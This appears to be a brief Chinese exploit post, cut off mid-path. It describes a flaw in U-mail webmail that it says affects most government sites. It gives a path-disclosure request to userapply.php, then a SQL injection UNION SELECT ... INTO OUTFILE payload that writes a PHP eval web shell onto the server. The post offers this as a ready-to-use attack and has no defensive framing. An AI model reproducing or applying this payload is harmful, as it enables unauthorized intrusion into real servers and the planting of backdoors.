大部分政府网站U-mail存在直接拿shell漏洞

admin 发布于 2014-03-18 10:18
加入 webmail/userapply.php?execadd=333&DomainID=111 直接爆出物理地址 然后将 aa' union select 1,2,3,4,5,6,'<?php eval($_POST1);?>',8,9,10,11,12,13,14 into outfile 'D:/umail/WorldClie...